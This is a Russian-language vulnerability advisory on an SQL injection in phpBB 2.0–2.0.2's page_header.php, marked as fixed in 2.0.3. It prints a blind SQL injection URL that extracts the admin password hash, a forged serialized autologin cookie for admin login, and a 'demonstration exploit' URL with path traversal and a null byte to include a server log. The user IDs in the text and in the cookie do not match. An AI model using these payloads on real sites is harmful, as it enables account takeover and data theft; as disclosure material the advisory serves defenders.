Административный доступ к PHPbb системе
| Дата публикации: | 21.02.2003 |
| Всего просмотров: | 5567 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Раскрытие важных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | phpBB 2.x |
| Описание: | В phpBB обнаружена возможность изменения SQL запроса. Удаленный пользователь может получить хеш пароля администратора и, используя его, получить полный контроль над PHPbb системой. Уязвимость обнаружена в сценарии page_header.php. Например, чтобы взломать user_id '40', запросите следующую страницу: http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid (user_password,1,1)=char(97)/*В результате запрос будет выглядеть следующим образом: SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level, s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s WHERE u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND s.session_page = 1 or user_id=40 and mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC, s.session_ip ASCИмя администратора системы можно просмотреть вверху списка пользователей внизу страницы форума. Далее добавляя хеш пароля в куки, можно войти на сайт как администратор системы. Например, если user_id равен 32360, и хеш пароля - 6a204bd89f3c8348afd5c77c717a097a, то атакующий должен добавить следующее значение:
a:2:
{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:
5:"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
Затем urlencode() это и поместите в куки с переменной 'phpbb2support_data', затем обратитесь к административной странице на phpbb сайте.
Демонстрационный эксплоит:
http://[target]/phpBB/prefs.php?HTTP_POST_VARS[save] =1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disbbco de=0&themes =1&lang=/../../../var/logs/apache/access.log%00 &save=1&user=admin&submit=Save%20Preferences Уязвимость обнаружена в phpBB 2.0,2.01, 2.02 и устранена в 2.03 |
| Ссылки: | phpBB Security Bugs |